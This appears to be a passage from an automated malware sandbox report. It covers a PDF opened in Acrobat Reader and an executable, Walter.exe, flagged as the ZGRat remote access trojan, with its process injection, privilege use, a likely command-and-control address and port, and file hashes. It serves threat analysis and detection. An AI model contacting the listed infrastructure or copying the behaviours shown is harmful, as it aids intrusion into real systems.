PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RIB.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FF7CE518D4EC21B0743587B82E6ECC8E --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --renderer-client-id=2 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F920421836A4D80FFB4795834086BD86 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=169BB5BAB9F9F7C182E71310ACE2C663 --mojo-platform-channel-handle=2412 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=94AD9E1E45E47E153EA99DEFD214CF1C --mojo-platform-channel-handle=2420 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC4D037BE538E059872178F8193148FF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC4D037BE538E059872178F8193148FF --renderer-client-id=8 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=236DD7BCEA487CAEDD45801581597C13 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=236DD7BCEA487CAEDD45801581597C13 --renderer-client-id=10 --mojo-platform-channel-handle=2684 --allow-no-sandbox-job /prefetch:1

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 169.0.37.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 14.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 192.98.74.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

memory/3916-28-0x0000000009770000-0x0000000009791000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 e5b1404a25894361f2981fd4d9b1fa01
SHA1 a5bd0a94f2bfab6b10dcc61280747e98dcb1448b
SHA256 02ac40ae1bba053d949c71fb2849105424a2db85b00a5029eb43c5c18d963724
SHA512 84dcc3f6b2791d4c86948308151d9708c00fd84dea42fe27a05fab83bd30a21965c652fa9cb607013867d325a952aea67297bf9f8086403e9ebdd7c3d12a0fff

memory/3916-133-0x0000000009770000-0x0000000009791000-memory.dmp

memory/3916-135-0x000000000A300000-0x000000000A44D000-memory.dmp

memory/3916-143-0x000000000A300000-0x000000000A44D000-memory.dmp

memory/3916-146-0x000000000A590000-0x000000000A5BA000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

144s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3580 set thread context of 1596 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
NL 38.170.242.108:7785 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

memory/3580-0-0x0000020FBB5C0000-0x0000020FBB728000-memory.dmp

memory/3580-2-0x00007FF813890000-0x00007FF814351000-memory.dmp

memory/3580-3-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-4-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-8-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-14-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-24-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-32-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-38-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-40-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-46-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-52-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-56-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-64-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-66-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-62-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-60-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-58-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-54-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-50-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-48-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-44-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-42-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-36-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-34-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-30-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-28-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-26-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-22-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

